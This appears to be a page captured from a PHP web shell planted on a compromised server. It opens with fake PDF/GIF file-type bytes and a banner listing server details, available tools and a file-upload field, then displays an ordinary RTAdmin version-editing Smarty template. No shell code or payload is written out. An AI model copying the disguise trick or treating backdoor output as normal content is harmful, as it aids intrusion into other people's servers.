%PDF-1.7 GIF89;
| Server IP : 104.20.45.2 / Your IP : 172.16.20.3 Web Server : Apache/2.4.25 (Debian) System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : application ( 1000) PHP Version : 5.6.40 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /app/templates/rtadmin/ |
Upload File : |
{**
* templates/rtadmin/version.tpl
*
* Copyright (c) 2013-2019 Simon Fraser University
* Copyright (c) 2003-2019 John Willinsky
* Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
*
* RTAdmin version editing
*
*}
{strip}
{assign var="pageTitle" value="rt.admin.versions.edit.editVersion"}
{include file="common/header.tpl"}
{/strip}
{if $versionId}
<ul class="menu">
<li class="current"><a href="{url op="editVersion" path=$versionId}" class="action">{translate key="rt.admin.versions.metadata"}</a></li>
<li><a href="{url op="contexts" path=$versionId}" class="action">{translate key="rt.contexts"}</a></li>
</ul>
{/if}
<br />
<form action="{if $versionId}{url op="saveVersion" path=$versionId}{else}{url op="createVersion" path="save"}{/if}" method="post">
<table class="data" width="100%">
<tr valign="top">
<td class="label" width="20%"><label for="title">{translate key="rt.version.title"}</label></td>
<td class="value" width="80%"><input type="text" class="textField" name="title" id="title" value="{$title|escape}" size="60" /></td>
</tr>
<tr valign="top">
<td class="label"><label for="key">{translate key="rt.version.key"}</label></td>
<td class="value"><input type="text" class="textField" name="key" id="key" value="{$key|escape}" size="60" /></td>
</tr>
<tr valign="top">
<td class="label"><label for="locale">{translate key="rt.version.locale"}</label></td>
<td class="value"><input type="text" class="textField" name="locale" id="locale" maxlength="5" size="5" value="{$locale|escape}" /></td>
</tr>
<tr valign="top">
<td class="label"><label for="description">{translate key="rt.version.description"}</label></td>
<td class="value">
<textarea class="textArea" name="description" id="description" rows="5" cols="60">{$description|escape}</textarea>
</td>
</tr>
</table>
<p><input type="submit" value="{translate key="common.save"}" class="button defaultButton" /> <input type="button" value="{translate key="common.cancel"}" class="button" onclick="document.location.href='{url op="versions" escape=false}'" /></p>
</form>
{include file="common/footer.tpl"}